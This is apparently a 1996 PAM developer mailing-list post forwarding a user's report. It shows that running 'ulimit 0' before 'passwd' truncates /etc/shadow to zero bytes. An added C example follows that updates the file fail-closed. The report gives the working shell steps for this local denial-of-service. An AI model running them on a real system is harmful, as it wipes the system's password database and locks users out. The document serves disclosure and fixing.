
passwd module attack...

This isn't too hard to deal with in the passwd module; does someone
want to deal with this before .53 is released?

Also, should the framework protect against attacks like this and
thereby make it easier to write modules?


------- Forwarded Message

From: Cedric Maion <cmaion@I209-b.resI.insa-lyon.fr>
To: "'johnsonm@redhat.com'" <johnsonm@redhat.com>
Subject: Denial of service attack with passwd !
Date: Sun, 6 Oct 1996 02:54:45 +0100


I'm using PAM and shadow-utils on my Linux box. Great. That's pretty cool, but....
It sounds terrible, but everybody could easily zero my /etc/shadow file... !!!!

All you need is to type :

$ ulimit 0
$ passwd
New passsword:
New password (again):
Password changed
passwd: all authentification tokens updated successfully

Then :
$ ls -al /etc/shadow
-r--------   1 root            0 Oct   6 02:37 shadow

Argh !  :-(

I send this to you, because I do not really know where I should post this, but I think it may be linked with PAM (or at least with passwd).

Could you contact the right person ?

Thanks in advance !

       Cedric Maion

--
Cedric Maion


Email :
   -- PGP public key available --

------- End of Forwarded Message
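
One way a privileged updater can fail closed under the `ulimit 0` condition reported above, as an added example that is not the passwd module's own code. It assumes the truncation comes from unchecked writes hitting the file-size limit; `safe_replace`, `size_after_limited_update` and the `.tmp` suffix are hypothetical names.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: replace `path` with `data`, or leave it untouched. */
int safe_replace(const char *path, const char *data, size_t len)
{
    char tmp[4096];
    size_t off = 0;
    int fd, ok;
    /* With SIGXFSZ ignored, a write past RLIMIT_FSIZE fails with EFBIG
       instead of killing the process mid-update. */
    signal(SIGXFSZ, SIG_IGN);
    if (snprintf(tmp, sizeof tmp, "%s.tmp", path) >= (int)sizeof tmp)
        return -1;
    if ((fd = open(tmp, O_WRONLY | O_CREAT | O_EXCL, 0600)) < 0)
        return -1;
    while (off < len) {
        ssize_t n = write(fd, data + off, len - off);
        if (n <= 0)
            break;                      /* failed write: stop, do not swap */
        off += (size_t)n;
    }
    ok = (off == len) && fsync(fd) == 0;
    ok = (close(fd) == 0) && ok;        /* always close, keep earlier failure */
    if (ok && rename(tmp, path) == 0)   /* atomic swap only after full write */
        return 0;
    unlink(tmp);
    return -1;
}

/* Constructed check: attempt an update under a zero file-size limit and
   return the size of `path` afterwards, or -1 if the update "succeeded". */
long size_after_limited_update(const char *path, const char *data, size_t len)
{
    struct rlimit old, zero;
    struct stat st;
    int rc;
    getrlimit(RLIMIT_FSIZE, &old);
    zero = old;
    zero.rlim_cur = 0;
    setrlimit(RLIMIT_FSIZE, &zero);
    rc = safe_replace(path, data, len);
    setrlimit(RLIMIT_FSIZE, &old);      /* restore the soft limit */
    return (rc == 0 || stat(path, &st) != 0) ? -1 : (long)st.st_size;
}
```

The caller reports success only when `safe_replace` returns 0, so a refused write leaves the existing file in place and produces an error instead of "Password changed".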
